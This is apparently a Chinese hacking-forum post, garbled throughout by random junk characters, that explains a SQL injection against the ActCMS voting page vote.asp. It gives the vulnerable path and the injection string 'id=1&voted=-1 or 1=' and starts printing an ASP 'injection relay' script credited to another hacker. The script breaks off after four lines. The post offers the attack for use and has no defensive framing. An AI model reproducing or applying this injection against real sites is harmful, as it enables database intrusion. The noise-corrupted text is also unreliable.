7 U0 H( W) w, e- G3 ?利用这点来注入,由于ninty大牛学java的,但是java运行环境实在是。。。。不说了 6 T, ^! t4 s+ B2 C" k9 ?2 ]0 o - T z$ J& A, L本帖隐藏的内容需要回复才可以浏览1 X/ H. A1 v4 L7 S W
我们用注入中转来实现这个注入具体代码如下:" U% V! v5 d$ w/ ?4 p2 I) }
先用寂寞的刺猬大牛的注入中转生成jmget.asp. w) Q: _- z d, s
注入地址:http://localhost/actcms/plus/vote/vote.asp6 S& H7 Z. N+ k" {3 V* V& h
注入键值:id=1&voted=-1 or 1= '这里这样换的话就有学问了,不用去判断有什么投票选项) E" N, w, X: Y u& c# l# B# F
) e) n0 x0 n) [% h. X
然后进行修改变成如下代码: 链接标记预览源代码链接标记打印链接标记关于01<% 3 }) L$ A' S' E
j @+ ?. a# m+ n3 w$ G' s- t
02JmdcwName=request("jmdcw") 3 l1 c) _' N; c) r7 ]& s
: h+ S$ r5 h8 N0 z03' 注入中转站 GET 版,BY 寂寞的刺猬 [L.S.T] 4 {0 X( b8 c3 V
0 ?: r6 o5 {% q3 _3 Q
04JmStr="id=1&voted=-1 or 1="&JmdcwName 9 Q7 a& X! s' v* }5 w